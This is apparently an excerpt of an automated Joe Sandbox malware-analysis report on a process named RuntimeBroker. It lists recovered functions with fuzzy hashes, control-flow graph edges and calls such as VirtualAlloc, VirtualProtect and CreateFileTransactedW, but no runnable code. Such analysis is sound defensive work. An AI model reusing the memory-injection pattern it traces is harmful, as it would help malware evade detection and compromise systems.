                                                                                                                            • Instruction Fuzzy Hash: FC51B46BB8D52A4DE31936A839A68FD3705DF61339B0487F3F02F890D79E1C658249C9
                                                                                                                            Function 00007FFD9B78063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-2669795199
                                                                                                                            • Opcode ID: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction ID: b2d476ffd19997ad234100e74d0fd1db783ce08a0071fe2398154569ae5c5315
                                                                                                                            • Opcode Fuzzy Hash: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction Fuzzy Hash: 2A81261BB8D92A0DE31877AD79A28FD7701DFA1339B0447F3F16E890D79E18608249D5
                                                                                                                            Function 00007FFD9B7806D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.1869522845.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-1616130478
                                                                                                                            • Opcode ID: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction ID: c86d23a7e025d968d72934d9aba778a1369aa11ba2357ee5694e651c43545c46
                                                                                                                            • Opcode Fuzzy Hash: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction Fuzzy Hash: 6951B12BB8C52A4DE31977A835A68FD3701CF61339B0487F7F16E890DB5E1C658249C9

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:4.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:25%
                                                                                                                            Total number of Nodes:16
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 35047 7ffd9b78b4ba 35048 7ffd9b78b4c9 VirtualProtect 35047->35048 35050 7ffd9b78b5ae 35048->35050 35034 7ffd9b7c72e0 35035 7ffd9b7c72e9 CreateFileTransactedW 35034->35035 35037 7ffd9b7c74ea 35035->35037 35038 7ffd9b7c9321 35039 7ffd9b7c932c 35038->35039 35040 7ffd9b7c9374 GetSystemInfo 35038->35040 35042 7ffd9b7c94fe 35040->35042 35043 7ffd9b78c491 35044 7ffd9b78c49f VirtualAlloc 35043->35044 35046 7ffd9b78c554 35044->35046 35051 7ffd9b7c75b1 35052 7ffd9b7c7614 WriteFile 35051->35052 35054 7ffd9b7c7697 35052->35054

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B7C9321 Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 237 7ffd9b7c9321-7ffd9b7c932a 238 7ffd9b7c932c-7ffd9b7c9350 237->238 239 7ffd9b7c9374-7ffd9b7c9461 237->239 240 7ffd9b7c9463 239->240 241 7ffd9b7c9464-7ffd9b7c94fc GetSystemInfo 239->241 240->241 244 7ffd9b7c9504-7ffd9b7c9525 241->244 245 7ffd9b7c94fe 241->245 245->244
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7b1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0285f7c6305afaf8ba7a9a818f8396fe87e5ec686d5cb1776c13ac7211bfdcad
                                                                                                                            • Instruction ID: 65762e788cbce305944324100907b3f4577f417fe2b3e42dad44aeea63779bb0
                                                                                                                            • Opcode Fuzzy Hash: 0285f7c6305afaf8ba7a9a818f8396fe87e5ec686d5cb1776c13ac7211bfdcad
                                                                                                                            • Instruction Fuzzy Hash: 6271EF7190E7C94FD707CB649C65AE57FF0EF17220B0A42DBD088CB1A3D628695AC762
                                                                                                                            Function 00007FFD9B780D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 254 7ffd9b780d48-7ffd9b780d9b call 7ffd9b7807d0 257 7ffd9b780da0-7ffd9b780f05 254->257 276 7ffd9b780f1e 257->276 277 7ffd9b780f07-7ffd9b780f1d 257->277 278 7ffd9b780f1f-7ffd9b781050 276->278 277->278
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5Y_H
                                                                                                                            • API String ID: 0-3237497481
                                                                                                                            • Opcode ID: d7db34ec579133843a1d6b73613b9fd970124fabf2fe1cd758191b969be8f6d2
                                                                                                                            • Instruction ID: e75ca82f8ddd4ce477fd482b096a07d1213fb66f0928512c3ffe1bcf769e367b
                                                                                                                            • Opcode Fuzzy Hash: d7db34ec579133843a1d6b73613b9fd970124fabf2fe1cd758191b969be8f6d2
                                                                                                                            • Instruction Fuzzy Hash: AA91C2B5A1AA8D8FE759DB68C875BA97FE1FF56311F0102BAD04AC73E2DA781410C740
                                                                                                                            Function 00007FFD9B78B4BA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B787000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B787000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b787000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 544645111-3372436214
                                                                                                                            • Opcode ID: b3f30793960882d67dc7c186af5a592665a49ecd235fb7afad7ff61401f353d8
                                                                                                                            • Instruction ID: 3da5929e462b6084426e8954a1f0fd152cc7670fdf79d73c53ce680aa56e7544
                                                                                                                            • Opcode Fuzzy Hash: b3f30793960882d67dc7c186af5a592665a49ecd235fb7afad7ff61401f353d8
                                                                                                                            • Instruction Fuzzy Hash: 7A412E3190C7894FD7199BA89C566E97FE0EF56321F0443AFD099C3293DA746406C792
                                                                                                                            Function 00007FFD9B791752 Relevance: 2.2, Strings: 1, Instructions: 948COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 11 7ffd9b791752 12 7ffd9b791757-7ffd9b79177d 11->12 15 7ffd9b7918d1-7ffd9b7918fb 12->15 16 7ffd9b791783-7ffd9b7917ae 12->16 21 7ffd9b791947-7ffd9b79194a 15->21 22 7ffd9b7918fd-7ffd9b79191a 15->22 26 7ffd9b7917bd-7ffd9b791845 16->26 27 7ffd9b7917b0-7ffd9b7917ba 16->27 25 7ffd9b791951-7ffd9b791958 21->25 28 7ffd9b791a8b-7ffd9b791a93 22->28 29 7ffd9b791920-7ffd9b791945 22->29 30 7ffd9b79195a-7ffd9b791967 25->30 61 7ffd9b791847-7ffd9b79188a 26->61 62 7ffd9b79188c-7ffd9b79188f 26->62 27->26 35 7ffd9b791a94-7ffd9b791a99 28->35 29->21 34 7ffd9b79196e-7ffd9b791986 30->34 44 7ffd9b791a2c-7ffd9b791a42 34->44 45 7ffd9b79198c-7ffd9b7919df 34->45 38 7ffd9b791a47-7ffd9b791a62 35->38 39 7ffd9b791a9b-7ffd9b791aaf 35->39 55 7ffd9b791a69-7ffd9b791a84 38->55 46 7ffd9b791c4d-7ffd9b791c4e 39->46 44->46 45->55 69 7ffd9b7919e5-7ffd9b7919f0 45->69 48 7ffd9b791c55-7ffd9b791c61 46->48 49 7ffd9b791c50 call 7ffd9b792918 46->49 49->48 55->28 68 7ffd9b7918b1-7ffd9b7918cb 61->68 64 7ffd9b791891-7ffd9b7918a2 62->64 65 7ffd9b7918a4-7ffd9b7918a5 62->65 64->68 65->68 68->15 68->16 72 7ffd9b7919f6-7ffd9b791a00 69->72 73 7ffd9b790f9d-7ffd9b790fdc 69->73 72->35 75 7ffd9b791a06-7ffd9b791a26 72->75 84 7ffd9b790fde-7ffd9b791149 73->84 75->44 75->45 109 7ffd9b791178-7ffd9b7911b9 84->109 110 7ffd9b79114b-7ffd9b791154 84->110 122 7ffd9b7911bb-7ffd9b7911cd 109->122 123 7ffd9b7911ce-7ffd9b791243 109->123 112 7ffd9b791699-7ffd9b7916cf 110->112 113 7ffd9b79115a-7ffd9b79116a 110->113 124 7ffd9b791748-7ffd9b791751 112->124 125 7ffd9b7916d1-7ffd9b791710 112->125 117 7ffd9b791170-7ffd9b791174 113->117 117->109 122->123 140 7ffd9b791245-7ffd9b79126e 123->140 141 7ffd9b791274-7ffd9b7912c3 123->141 124->11 134 7ffd9b79172a-7ffd9b791746 125->134 135 7ffd9b791712-7ffd9b791715 125->135 134->124 134->125 135->134 137 7ffd9b791717-7ffd9b791727 135->137 137->134 140->141 149 7ffd9b7912c5-7ffd9b7912ca 141->149 150 7ffd9b7912cf-7ffd9b791307 141->150 151 7ffd9b791683-7ffd9b791693 149->151 155 7ffd9b791309-7ffd9b79130e 150->155 156 7ffd9b791313-7ffd9b79134b 150->156 151->112 151->117 155->151 160 7ffd9b791357-7ffd9b79138f 156->160 161 7ffd9b79134d-7ffd9b791352 156->161 165 7ffd9b79139b-7ffd9b7913d3 160->165 166 7ffd9b791391-7ffd9b791396 160->166 161->151 170 7ffd9b7913d5-7ffd9b7913da 165->170 171 7ffd9b7913df-7ffd9b791417 165->171 166->151 170->151 175 7ffd9b791419-7ffd9b79141e 171->175 176 7ffd9b791423-7ffd9b79145b 171->176 175->151 180 7ffd9b791467-7ffd9b79149f 176->180 181 7ffd9b79145d-7ffd9b791462 176->181 185 7ffd9b7914ab-7ffd9b7914e3 180->185 186 7ffd9b7914a1-7ffd9b7914a6 180->186 181->151 190 7ffd9b7914e5-7ffd9b7914ea 185->190 191 7ffd9b7914ef-7ffd9b791527 185->191 186->151 190->151 195 7ffd9b791529-7ffd9b79152e 191->195 196 7ffd9b791533-7ffd9b79156b 191->196 195->151 200 7ffd9b791577-7ffd9b7915af 196->200 201 7ffd9b79156d-7ffd9b791572 196->201 205 7ffd9b7915bb-7ffd9b7915c4 200->205 206 7ffd9b7915b1-7ffd9b7915b6 200->206 201->151 205->151 206->151
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: L_H
                                                                                                                            • API String ID: 0-1918747621
                                                                                                                            • Opcode ID: c5ac6848a6364a1f380f6e58ab5a9c9cc42790a1a3325ee097d33a02da22b906
                                                                                                                            • Instruction ID: c90c0e82bccbd5bb77aec234c267af9dc5c9ab1f481697fa1b053e2cafadbfe5
                                                                                                                            • Opcode Fuzzy Hash: c5ac6848a6364a1f380f6e58ab5a9c9cc42790a1a3325ee097d33a02da22b906
                                                                                                                            • Instruction Fuzzy Hash: 9D62A421F19A4E5FEBA8EB6884A5A7873D2FF98301F0506B9D41EC36F2DE346D418741
                                                                                                                            Function 00007FFD9B7C72E0 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 208 7ffd9b7c72e0-7ffd9b7c72ec 210 7ffd9b7c72f7-7ffd9b7c732c 208->210 211 7ffd9b7c72ee-7ffd9b7c72f6 208->211 216 7ffd9b7c73a0 210->216 217 7ffd9b7c732e-7ffd9b7c733c 210->217 211->210 218 7ffd9b7c7379-7ffd9b7c7382 216->218 219 7ffd9b7c73a2-7ffd9b7c7462 216->219 221 7ffd9b7c7340-7ffd9b7c7366 217->221 222 7ffd9b7c733f 217->222 218->216 232 7ffd9b7c746c-7ffd9b7c74e8 CreateFileTransactedW 219->232 233 7ffd9b7c7464-7ffd9b7c7469 219->233 221->218 222->221 234 7ffd9b7c74ea 232->234 235 7ffd9b7c74f0-7ffd9b7c751a 232->235 233->232 234->235
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7b1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9775fccdb691ec52cdbad574e9bd0c1682857233db0ce443df3a6f35ae2244b9
                                                                                                                            • Instruction ID: 2291dab41b68d2fce6229cbcb2193cbe99ec884dfcb3bd94df8f5c7d1b22fa8f
                                                                                                                            • Opcode Fuzzy Hash: 9775fccdb691ec52cdbad574e9bd0c1682857233db0ce443df3a6f35ae2244b9
                                                                                                                            • Instruction Fuzzy Hash: 10713732A0DB895FEB18EF5898515F87FE0EF69310F0401BFE488C72A3DA24A945C781
                                                                                                                            Function 00007FFD9B7C75B1 Relevance: 1.6, APIs: 1, Instructions: 135fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 247 7ffd9b7c75b1-7ffd9b7c7641 250 7ffd9b7c764b-7ffd9b7c7695 WriteFile 247->250 251 7ffd9b7c7643-7ffd9b7c7648 247->251 252 7ffd9b7c7697 250->252 253 7ffd9b7c769d-7ffd9b7c76c5 250->253 251->250 252->253
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7b1000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: a2c58d7571df892e87f6a2e7576d3beb0c4734e60b4ce6e8ba8f8b82d19fde4b
                                                                                                                            • Instruction ID: ff0a508696ef18a52847f937af5e587521afee6ebd16704b3492368ceff81cbb
                                                                                                                            • Opcode Fuzzy Hash: a2c58d7571df892e87f6a2e7576d3beb0c4734e60b4ce6e8ba8f8b82d19fde4b
                                                                                                                            • Instruction Fuzzy Hash: 4931AF3190CA5C9FDB18DF58D845AB9BBE1FBA9311F00426FE04AD3292CB74A845CB91
                                                                                                                            Function 00007FFD9BB76058 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 291 7ffd9bb76058-7ffd9bb76070 293 7ffd9bb76078-7ffd9bb760a3 291->293 297 7ffd9bb760cc-7ffd9bb760d2 293->297 298 7ffd9bb760d9-7ffd9bb760df 297->298 299 7ffd9bb760e1-7ffd9bb760e6 298->299 300 7ffd9bb760a5-7ffd9bb760be 298->300 303 7ffd9bb75fd3-7ffd9bb76018 299->303 304 7ffd9bb760ec-7ffd9bb76121 299->304 301 7ffd9bb760c4-7ffd9bb760c9 300->301 302 7ffd9bb761b5-7ffd9bb761c5 300->302 301->297 309 7ffd9bb761c7 302->309 310 7ffd9bb761c8-7ffd9bb76216 302->310 303->298 308 7ffd9bb7601e-7ffd9bb76024 303->308 311 7ffd9bb75fd5-7ffd9bb761ad 308->311 312 7ffd9bb76026 308->312 309->310 311->302 316 7ffd9bb7604f-7ffd9bb76056 312->316 316->291 319 7ffd9bb76028-7ffd9bb76041 316->319 319->302 320 7ffd9bb76047-7ffd9bb7604c 319->320 320->316
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 5df8b90b9becd74bf5debe6619869b04e01813db385b2ae3c215e2467174c737
                                                                                                                            • Instruction ID: ea0f5ce4828fedd2d79655d2ec1b8fdbe9adfff993c03fece237e03c88053482
                                                                                                                            • Opcode Fuzzy Hash: 5df8b90b9becd74bf5debe6619869b04e01813db385b2ae3c215e2467174c737
                                                                                                                            • Instruction Fuzzy Hash: A2517A71E0A64E8FDB59DB98C4A05BCB7B1FF54304F1540BAD01EE76E2DA396A05CB40
                                                                                                                            Function 00007FFD9BB71008 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 323 7ffd9bb71008-7ffd9bb71020 325 7ffd9bb71028-7ffd9bb71053 323->325 329 7ffd9bb7107c-7ffd9bb71082 325->329 330 7ffd9bb71089-7ffd9bb7108f 329->330 331 7ffd9bb71091-7ffd9bb71096 330->331 332 7ffd9bb71055-7ffd9bb7106e 330->332 335 7ffd9bb70f83-7ffd9bb70fc8 331->335 336 7ffd9bb7109c-7ffd9bb710d1 331->336 333 7ffd9bb71074-7ffd9bb71079 332->333 334 7ffd9bb71165-7ffd9bb71175 332->334 333->329 341 7ffd9bb71177 334->341 342 7ffd9bb71178-7ffd9bb711c6 334->342 335->330 340 7ffd9bb70fce-7ffd9bb70fd4 335->340 343 7ffd9bb70f85-7ffd9bb7115d 340->343 344 7ffd9bb70fd6 340->344 341->342 343->334 348 7ffd9bb70fff-7ffd9bb71006 344->348 348->323 349 7ffd9bb70fd8-7ffd9bb70ff1 348->349 349->334 352 7ffd9bb70ff7-7ffd9bb70ffc 349->352 352->348
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 6437fd8e50ecb0b9f04d8f66621a56602f7a65188fca19432350ca40fd35dead
                                                                                                                            • Instruction ID: 73e69b69f3d122b066943d0c8a2345801fc6e7bc8d0c5b4f37d8d09ad1100641
                                                                                                                            • Opcode Fuzzy Hash: 6437fd8e50ecb0b9f04d8f66621a56602f7a65188fca19432350ca40fd35dead
                                                                                                                            • Instruction Fuzzy Hash: C5515B31E0964E8FDB69DB98C4A19BDB7B1FF44304F1141BAD01EA76E6CA342A05CB50
                                                                                                                            Function 00007FFD9B78C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 354 7ffd9b78c491-7ffd9b78c49d 355 7ffd9b78c49f 354->355 356 7ffd9b78c4a1-7ffd9b78c4dd 354->356 355->356 357 7ffd9b78c4e1-7ffd9b78c552 VirtualAlloc 355->357 356->357 360 7ffd9b78c55a-7ffd9b78c582 357->360 361 7ffd9b78c554 357->361 361->360
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B787000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B787000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b787000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 4069e9fda7d051ed738386979b65056dba7b730f24dae12bbd4d090aa485b557
                                                                                                                            • Instruction ID: afc39acca294940b3e3ec66b7eed3887df310a7c4f440a5f7f410dd3757f9e14
                                                                                                                            • Opcode Fuzzy Hash: 4069e9fda7d051ed738386979b65056dba7b730f24dae12bbd4d090aa485b557
                                                                                                                            • Instruction Fuzzy Hash: D2312831A0CB4C4FDB1DAB6898166F97BF0EF96321F04426FE08AC3162DA746816C7D1
                                                                                                                            Function 00007FFD9B78108D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 378 7ffd9b78108d-7ffd9b781091 379 7ffd9b781093 378->379 380 7ffd9b781095 378->380 379->380 381 7ffd9b781096-7ffd9b7810d0 379->381 380->381 383 7ffd9b7810db-7ffd9b7810fd 381->383
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b780000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: V
                                                                                                                            • API String ID: 0-1342839628
                                                                                                                            • Opcode ID: eb53b4ad2286b18c752df8ef71fff774ef0be073e485abe1e525c1d09895ce5f
                                                                                                                            • Instruction ID: e80c89f91aff44d9788e43c9bc6711128e0f1b25de412886cf5ab9fd60bfa9cb
                                                                                                                            • Opcode Fuzzy Hash: eb53b4ad2286b18c752df8ef71fff774ef0be073e485abe1e525c1d09895ce5f
                                                                                                                            • Instruction Fuzzy Hash: 3201F925A8E7C60FE71957B05CB1AF13F91DF87211B0A02FAE099CB5F3C85D59468361
                                                                                                                            Function 00007FFD9B793ED9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b790000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 567cdf3ee8062140d3c9384de5a066daa81cebd8e9f1b3a76243618fc175e5b8
                                                                                                                            • Instruction ID: 7c3678cc28f70364a763b4f5f46422e12ae629d8b5ed3912ba21244300d72511
                                                                                                                            • Opcode Fuzzy Hash: 567cdf3ee8062140d3c9384de5a066daa81cebd8e9f1b3a76243618fc175e5b8
                                                                                                                            • Instruction Fuzzy Hash: 0AE06D2160E3C44FCB16AB7488694547F60EE6720174A42EFC086CF1A3EA2D8989C701
                                                                                                                            Function 00007FFD9B7A93E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 56ff98885523ec0f5ec0d3e9dc2e53bda978fdaff60ad309620b41fed1df0763
                                                                                                                            • Instruction ID: 0b54e3a53526e70567dac6790b4a1307a343894bb03964fb9460437d7001135d
                                                                                                                            • Opcode Fuzzy Hash: 56ff98885523ec0f5ec0d3e9dc2e53bda978fdaff60ad309620b41fed1df0763
                                                                                                                            • Instruction Fuzzy Hash: 35E09A7250E3C48FCB46EB3488698147FA0EF6721078B00EEC089CF0B3E22D8848C701
                                                                                                                            Function 00007FFD9B7A9599 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4194358962.00007FFD9B7A3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b7a3000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: a0ba038d5a0666869cb4ee19728d093b1b47883988b0317f92c79ff28ba62495
                                                                                                                            • Instruction ID: 92bad3ded4df30533da0598432e3791a0ac8af6f907c69a769dd66c2a18bc632
                                                                                                                            • Opcode Fuzzy Hash: a0ba038d5a0666869cb4ee19728d093b1b47883988b0317f92c79ff28ba62495
                                                                                                                            • Instruction Fuzzy Hash: 57E04F7154A3C04FCB0AEB7488A98447FB0EE6721078B41DEC04ACB1B3E72DD949CB01
                                                                                                                            Function 00007FFD9B8E5678 Relevance: .6, Instructions: 588COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4198845884.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9b8e0000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 934b3edd296ecdd3166fcdb4129e05d8cf7671dbc39f519989b5af0b88f394bc
                                                                                                                            • Instruction ID: 016c6ce140915dcdce9f593614054aeef3d52406df5f3f51f9af39842454e816
                                                                                                                            • Opcode Fuzzy Hash: 934b3edd296ecdd3166fcdb4129e05d8cf7671dbc39f519989b5af0b88f394bc
                                                                                                                            • Instruction Fuzzy Hash: 772241B1A18A5D4FEB9CEB18C8A5EA8B7E1FB68340F0405F9D44DD3292DE357981CB41
                                                                                                                            Function 00007FFD9BB77311 Relevance: .5, Instructions: 487COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000002.4202438614.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_2_7ffd9bb70000_RuntimeBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5086c4dea32c26b69822ff25589b1f24d146d63714ef36b509d53fcf3e01970e
                                                                                                                            • Instruction ID: 7ee55589597a9eb7862e349f8926d16e7d098d5592b2b3f85de3d44df958ff4a
                                                                                                                            • Opcode Fuzzy Hash: 5086c4dea32c26b69822ff25589b1f24d146d63714ef36b509d53fcf3e01970e
                                                                                                                            • Instruction Fuzzy Hash: 8FF1C132B0EA4A8FD768DB99C4A057977E1FF44308B2105B9D45EC3AE2DE29B9418741
